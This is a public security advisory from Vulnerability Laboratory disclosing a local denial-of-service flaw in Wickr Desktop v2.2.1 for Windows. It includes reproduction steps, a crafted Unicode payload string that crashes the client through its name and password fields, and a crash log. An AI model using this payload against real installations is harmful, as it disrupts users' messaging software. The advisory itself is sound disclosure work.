231 lines
No EOL
10 KiB
Text
231 lines
No EOL
10 KiB
Text
Document Title:
|
|
===============
|
|
Wickr Desktop v2.2.1 Windows - Denial of Service Vulnerability
|
|
|
|
|
|
References (Source):
|
|
====================
|
|
http://www.vulnerability-lab.com/get_content.php?id=1377
|
|
|
|
Video:
|
|
http://www.vulnerability-lab.com/get_content.php?id=1388
|
|
|
|
|
|
Release Date:
|
|
=============
|
|
2014-12-25
|
|
|
|
|
|
Vulnerability Laboratory ID (VL-ID):
|
|
====================================
|
|
1377
|
|
|
|
|
|
Common Vulnerability Scoring System:
|
|
====================================
|
|
3.3
|
|
|
|
|
|
Product & Service Introduction:
|
|
===============================
|
|
Wickr (pronounced `wicker`) is a proprietary instant messenger for iPhone and Android. Wickr allows users to exchange end-to-end encrypted and
|
|
self-destructing messages, including photos and file attachments. The `self-destruct` part of the software is designed to use a `Secure File Shredder`
|
|
which the company says `forensically erases unwanted files you deleted from your device`. However the company uses a proprietary algorithm to manage
|
|
the data, a practice which is prone to error according to many security experts.
|
|
|
|
On January 15, 2014, Wickr announced it is offering a US$100,000 bug bounty for those who find vulnerabilities that significantly impact users. In addition,
|
|
a recipient can in general use other software and techniques like screen-capture capabilities or a separate camera to make permanent copies of the content.
|
|
|
|
(Copy of the Homepage: https://wickr.com/ )
|
|
|
|
|
|
Abstract Advisory Information:
|
|
==============================
|
|
The Vulnerability Laboratory Research team discovered a denial of service web vulnerability in the offical Wickr Desktop v2.2.1 windows software.
|
|
|
|
|
|
Vulnerability Disclosure Timeline:
|
|
==================================
|
|
2014-12-25: Public Disclosure (Vulnerability Laboratory)
|
|
|
|
|
|
Discovery Status:
|
|
=================
|
|
Published
|
|
|
|
|
|
Affected Product(s):
|
|
====================
|
|
Wickr Inc.
|
|
Product: Wickr - Desktop Software (Windows) 2.2.1
|
|
|
|
|
|
Exploitation Technique:
|
|
=======================
|
|
Local
|
|
|
|
|
|
Severity Level:
|
|
===============
|
|
Medium
|
|
|
|
|
|
Technical Details & Description:
|
|
================================
|
|
A local denial of service vulnerability has been discovered in the official Wickr TSM v2.2.1 (MSI) windows software.
|
|
The issue allows local attackers to crash or shutdown the software client by usage of special crafted symbole payloads.
|
|
|
|
The wickr v2.2.1 (msi) software crashs with unhandled exception in the CFLite.dll by the qsqlcipher_wickr.dll when processing to include
|
|
special crafted symbole strings
|
|
as password or name. The issue occurs after the input of the payload to the `change name friend contacts`-, `the wickr password auth`-
|
|
and the `friends > add friends` input fields. Attackers are able to change the name value of the own profile (payload) to crash the
|
|
wickr client. Local attackers can include the payload to the input fields to crash/shutdown the application with unhandled exception.
|
|
|
|
The security risk of the denial of service vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3.
|
|
Exploitation of the DoS vulnerability requires a low privileged application user account and low user interaction. Successful exploitation of
|
|
the vulnerability results in an application crash or service shutdown.
|
|
|
|
|
|
Vulnerable Module(s):
|
|
[+] friend contacts
|
|
[+] wickr password auth
|
|
[+] friends
|
|
|
|
Vulnerbale Input(s):
|
|
[+] add friends (name)
|
|
[+] wickr password auth
|
|
[+] change friend (update name)
|
|
|
|
Vulnerable Parameter(s):
|
|
[+] name (value input)
|
|
[+] password (vale input)
|
|
|
|
|
|
Proof of Concept (PoC):
|
|
=======================
|
|
The denial of service web vulnerability can be exploited by remote attackers and local attackers with low user interaction.
|
|
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
|
|
|
|
|
Manual steps to reproduce the vulnerability ...
|
|
1. Download Wickr v2.2.1 for windows to your windows 8 box (mywickr.info/download.php?p=4)
|
|
2. Install the wickr windows version of the software to your windows 8 box
|
|
3. Create an new account and include the payload to the password input field
|
|
Note: After the payload has been processed to the auth, the software crashs. You should attach a debugger ago.
|
|
4. Successful reproduce of the first issue!
|
|
5. We register a new account with regular values
|
|
6. Open the friends > add friends section and include the payload to the search input value
|
|
Note: After the payload has been processed to add the friend, the software crashs. You should attach a debugger ago.
|
|
7. Successful reproduce of the second issue!
|
|
8. We open the software again and login. Switch to the existing friends contacts and edit the profile
|
|
9. Include in the name values the payload and save the settings
|
|
Note: After the payload has been processed to change to the name, the software crashs. You should attach a debugger ago.
|
|
4. Successful reproduce of the third issue!
|
|
|
|
|
|
Payload: Denial of Service
|
|
็¬็ส็็็็็ -็็็็็็็็็็็็็็็็็็็็ส็¬็็็็็็็็¬็็็็็็็็็็็็็็็็ส็็็็¬็็็็็็็็็-็็็็็็็ ็็็็็ส็็็็็็็¬็็็็็็็็็็¬็็็็็็็็ส็็็็็็็็็็¬็็็็็็็็็็็ ¬็็็็ส็็็็็็็็็็็็็¬็็็็ ็็็็็็็็¬ส็็็็็็็็็็็็็็็็-็็็็็็็็็ส็็็็็็็็็็็็็็็็็็็ ¬็็็็็็ส็็็็็็็¬ส็็็็็็็็็็็็็็็็็็็็็็็็็ส็็็¬¬็็็็็็็็็็็็็็็็็็็็็็ส็็็็็็¬็
|
|
|
|
|
|
--- Error Report Logs ---
|
|
EventType=APPCRASH
|
|
EventTime=130628671359850105
|
|
ReportType=2
|
|
Consent=1
|
|
UploadTime=130628671360390638
|
|
ReportIdentifier=df89d941-8208-11e4-be8b-54bef733d5e7
|
|
IntegratorReportIdentifier=df89d940-8208-11e4-be8b-54bef733d5e7
|
|
WOW64=1
|
|
NsAppName=Wickr.exe
|
|
Response.BucketId=96ac0935c87e28d0d5f61ef072fd75b8
|
|
Response.BucketTable=1
|
|
Response.LegacyBucketId=73726044048
|
|
Response.type=4
|
|
Sig[0].Name=Anwendungsname
|
|
Sig[0].Value=Wickr.exe
|
|
Sig[1].Name=Anwendungsversion
|
|
Sig[1].Value=0.0.0.0
|
|
Sig[2].Name=Anwendungszeitstempel
|
|
Sig[2].Value=02849d78
|
|
Sig[3].Name=Fehlermodulname
|
|
Sig[3].Value=CFLite.dll
|
|
Sig[4].Name=Fehlermodulversion
|
|
Sig[4].Value=0.0.0.0
|
|
Sig[5].Name=Fehlermodulzeitstempel
|
|
Sig[5].Value=53f6c178
|
|
Sig[6].Name=Ausnahmecode
|
|
Sig[6].Value=c0000005
|
|
Sig[7].Name=Ausnahmeoffset
|
|
Sig[7].Value=00027966
|
|
DynamicSig[1].Name=Betriebsystemversion
|
|
DynamicSig[1].Value=6.3.9600.2.0.0.256.48
|
|
DynamicSig[2].Name=Gebietsschema-ID
|
|
DynamicSig[2].Value=1031
|
|
DynamicSig[22].Name=Zusatzinformation 1
|
|
DynamicSig[22].Value=5861
|
|
DynamicSig[23].Name=Zusatzinformation 2
|
|
DynamicSig[23].Value=5861822e1919d7c014bbb064c64908b2
|
|
DynamicSig[24].Name=Zusatzinformation 3
|
|
DynamicSig[24].Value=84a0
|
|
DynamicSig[25].Name=Zusatzinformation 4
|
|
DynamicSig[25].Value=84a09ea102a12ee665c500221db8c9d6
|
|
UI[2]=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\Wickr.exe
|
|
UI[3]=Wickr.exe funktioniert nicht mehr
|
|
UI[4]=Windows kann online nach einer Lösung für das Problem suchen.
|
|
UI[5]=Online nach einer Lösung suchen und das Programm schließen
|
|
UI[6]=Später online nach einer Lösung suchen und das Programm schließen
|
|
UI[7]=Programm schließen
|
|
... ... ... ...
|
|
LoadedModule[103]=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\sqldrivers\qsqlcipher_wickr.dll
|
|
State[0].Key=Transport.DoneStage1
|
|
State[0].Value=1
|
|
FriendlyEventName=Nicht mehr funktionsfähig
|
|
ConsentKey=APPCRASH
|
|
AppName=Wickr.exe
|
|
AppPath=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\Wickr.exe
|
|
NsPartner=windows
|
|
NsGroup=windows8
|
|
ApplicationIdentity=6A5425CE651532265F599A5A86C6C2EE
|
|
|
|
|
|
|
|
Security Risk:
|
|
==============
|
|
The security risk of the denial of service web vulnerability in the wickr windows client software is estimated as medium. (CVSS 3.3)
|
|
|
|
|
|
Credits & Authors:
|
|
==================
|
|
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
|
|
|
|
|
Disclaimer & Information:
|
|
=========================
|
|
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
|
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
|
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
|
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
|
|
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
|
|
policies, deface websites, hack into databases or trade with fraud/stolen material.
|
|
|
|
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
|
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
|
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
|
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
|
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
|
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
|
|
|
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
|
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
|
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
|
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
|
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
|
|
|
Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
|
|
|
|
|
--
|
|
VULNERABILITY LABORATORY - RESEARCH TEAM
|
|
SERVICE: www.vulnerability-lab.com
|
|
CONTACT: research@vulnerability-lab.com
|
|
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt |